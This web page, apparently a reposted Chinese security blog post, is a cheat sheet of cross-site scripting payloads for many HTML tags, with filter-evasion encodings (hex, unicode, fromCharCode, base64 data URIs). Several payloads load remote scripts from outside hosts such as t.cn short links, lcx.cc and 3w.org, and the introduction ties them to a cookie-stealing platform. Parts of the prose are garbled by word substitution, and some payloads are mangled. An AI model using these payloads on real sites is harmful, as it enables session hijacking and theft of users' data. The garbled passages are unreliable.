|
|
|
联系客服020-83701501

xss其他标签下的js用法总结大全

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
xss此外标签下的js用法总结大全

前段时间我遇到一个题目,就是说如今的平台取得cookie的语句为↓

Default
1 <script src=js地址></script>

实际上咱们的测试语句或是为↓

Default
1 <script>alert("90sec")</script>

也就是说js语句实际上是位于↓
<script></script>的两头。

包孕<img>、<input>、<object>、<iframe>、<a></a>、<svg>、标签等情况下的xss结构。

所以咱们就须要了解各种标签下的js用法,不然很多时分不或是垄断<script>就很费事了。

【XSS基本探测pyload】

Default
123456789101112131415 <script>alert(“xss”)</script><script>alert(/xss/)</script> //双引号换成斜杠<script>alert(‘xss’)</script> //用单引号<script>alert("xss");</script> //用分号<script>alert('xss');</script><script>alert(/xss/);</script><script>alert("jdq") //自动补全 <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //用分号<script>alert("xss");;;;;;;;;;;;;;;;;    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //空格+分号 <script>alert("xss");;;;;;;;;;;;;;;;;        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //换行符 <script>alert("xss");;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script> //回车

Default
12 单引号被过滤<script>alert(/jdq/)</script>  //用双引号会把引号内的模式独自作为模式 用斜杠,则会连斜杠一起回显

Default
12 【javascript伪协定】周旋<a href="javascript:alert(/test/)">xss</a>

Default
123 <script>被过滤↓ <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe框架标签

Default
12 alert被过滤<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

Default
12 【img标识表记标帜】<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>

Default
12 on事故点击触发onclick="alert('xss') //当心要用单引号 双引号不会触发

Default
12 on事故-移动触发Onmousemove="alert('xss')

Default
1234567 【利用函数加密】eval 函数合营编码 <script>eval(“js+16进制加密”)</script> <script>eval("\x61\x6c\x65\x72\x74\x28\x22\x78\x73\x73\x22\x29")</script>编码要实验的语句↓Alert(“xss”)

Default
123456 【unicode加密】<script>eval("unicode加密")</script>//js unicode加密 操持alert()被过滤<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>格式↓标识表记标帜eval(“编码”) 结束标识表记标帜

Default
1234567 【String.fromCharCod函数】String.fromCharCode须要合营eval来实现,结构<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>eval模式加引号相当于正常js语句来实验不加引号,则是默许作为eval的此外参数语句来执固定格式→<script>eval(String.fromCharCode编码模式))</script>

Default
12345678910111213 【data协定操作】<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUnE5bjZ6dT48L3NjcmlwdD4="></object>格式Data:[<mime type>][;charset=<charset>[;base64],<encoded data>Data //协定<mime type> //数据相同charset=<charset>  //指定编码[;base64] //被指定的编码<encoded data> //界说data协定的编码实际编码↓<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>base64编码要实验的模式特点:不反对IE

【各标签实战pyload】
——————————————————-xss此外标签下的js用法总结大全––——————————–————————————

Default
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210 <img src=javascript:document.write('<scr'+'ipt src=\'/uploads/allimg/191031/0943153Y9-7.jpg/1.txt\'></scr'+'ipt>')></img>  //仅反对IE6 <img src=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img>  //仅反对IE6 <img src="pdpdp.gif"></img>   //通杀全部阅读器 能触发xss <img src="pdpdp.gif"></img>   //通杀全部阅读器 能触发xss <img src=x onerror=document.body.appendChild(document.createElement("scr"+"ipt")).src="/uploads/allimg/191031/0943153Y9-7.jpg"> <input autofocus="bbbb" /> <object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></object> <iframe width="0px" height="0px" src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4="></iframe>  ie不反对 <a href="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5wb29qeC5jb20vMS5qcz48L3NjcmlwdD4=">sb</a> <anchor>、<img>(不实验js) <a>(需点击) <meta>..... <anchor onload=document.body.appendChild(document.createElement("scr"+"ipt")).src="/uploads/allimg/191031/0943153Y9-7.jpg"> <svg onload=document.body.appendChild(document.CReateElement("scr"+"ipt")).src="/uploads/allimg/191031/0943153Y9-7.jpg"> <svg onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,46,99,110,47,82,71,117,87,68,68,83,62,60,47,115,99,114,105,112,116,62))> <baa id="1" tabindex=0> (1)如今的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS垄断JavaScript饬令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号<IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签巨细写不迟钝<IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必需有分号)<IMG SRC=javascript:alert(“XSS”)> (6)修改偏差IMG标签<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> (7)formCharCode标签<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8的Unicode编码<IMG SRC=jav..省略..S')> (9)7位的UTF-8的Unicode编码是不有分号的<IMG SRC=jav..省略..S')> (10)十六进制编码也是不有分号<IMG SRC=\'#\'" /span> (11)嵌入式标签,将Javascript分开<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (12)嵌入式编码标签,将Javascript分开<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (13)嵌入式换行符<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (14)嵌入式回车<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> (15)嵌入式多行注入JavaScript,这是XSS十分的例子<IMG SRC=\'#\'" /span> (16)操持限制字符(申请同页面)<script>z=’document.’</script><script>z=z+’write(“‘</script><script>z=z+’<script’</script><script>z=z+’ src=ht’</script><script>z=z+’tp://ww’</script><script>z=z+’w.shell’</script><script>z=z+’.net/1.’</script><script>z=z+’js></sc’</script><script>z=z+’ript>”)’</script><script>eval_r(z)</script> (17)空字符perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out (18)空字符2,空字符在国内基本没成绩.因为不有地方或是利用perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out (19)Spaces和meta前的IMG标签<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”> (20)Non-alpha-non-digit XSS<SCRIPT/XSS SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> (21)Non-alpha-non-digit XSS to 2<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> (22)Non-alpha-non-digit XSS to 3<SCRIPT/SRC=\'#\'" /span>[url=http://3w.org/XSS/xss.js]http://3w.org/XSS/xss.js[/url]”></SCRIPT> (23)双开括号<<SCRIPT>alert(“XSS”);//<</SCRIPT> (24)无结束脚本标识表记标帜(仅火狐等阅读器)<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> (25)无结束脚本标识表记标帜2<SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的HTML/JavaScript XSS<IMG SRC=\'#\'" /span> (27)双开角括号<iframe src=http://3w.org/XSS.html < (28)无单引号 双引号 分号<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> (29)换码过滤的JavaScript\”;alert(‘XSS’);// (30)结束Title标签</TITLE><SCRIPT>alert(“XSS”);</SCRIPT> (31)Input Image<INPUT SRC=\'#\'" /span> (32)BODY Image<BODY BACKGROUND=”javascript:alert(‘XSS’)”> (33)BODY标签<BODY(‘XSS’)> (34)IMG Dynsrc<IMG DYNSRC=\'#\'" /span> (35)IMG Lowsrc<IMG LOWSRC=\'#\'" /span> (36)BGSOUND<BGSOUND SRC=\'#\'" /span> (37)STYLE sheet<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> (38)长途格式表<LINK REL=”stylesheet” HREF=”[url=http://3w.org/xss.css]http://3w.org/xss.css[/url]”> (39)List-style-image(列表式)<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS (40)IMG VBscript<IMG SRC=\'#\'" /STYLE><UL><LI>XSS (41)META链接url<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”> (42)Iframe<IFRAME SRC=\'#\'" /IFRAME> (43)Frame<FRAMESET><FRAME SRC=\'#\'" /FRAMESET> (44)Table<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> (45)TD<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> (46)DIV background-image<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> (47)DIV background-image后加之额外字符(1-32&34&39&160&8192-8&13&12288&65279)<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> (48)DIV expression<DIV STYLE=”width: expression_r(alert(‘XSS’));”> (49)STYLE属性分拆表明<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> (50)匿名STYLE(形成:开角号和一个字母末了)<XSS STYLE=”xss:expression_r(alert(‘XSS’))”> (51)STYLE background-image<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> (52)IMG STYLE门径exppression(alert(“XSS”))’> (53)STYLE background<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> (54)BASE<BASE HREF=”javascript:alert(‘XSS’);//”> (55)EMBED标签,你或是嵌入FLASH,此中留情XSS<EMBED SRC=\'#\'" /span>[flash]http://3w.org/XSS/xss.swf[/flash]” ></EMBED>


——————————————-xss此外标签下的js用法总结大全––——————————–————————————

相同的东西也有人发过,我针对XSS利用中的各标签利用实例整理了下。算是对比全面的。

[via@接地气]

数安新闻+更多

证书相关+更多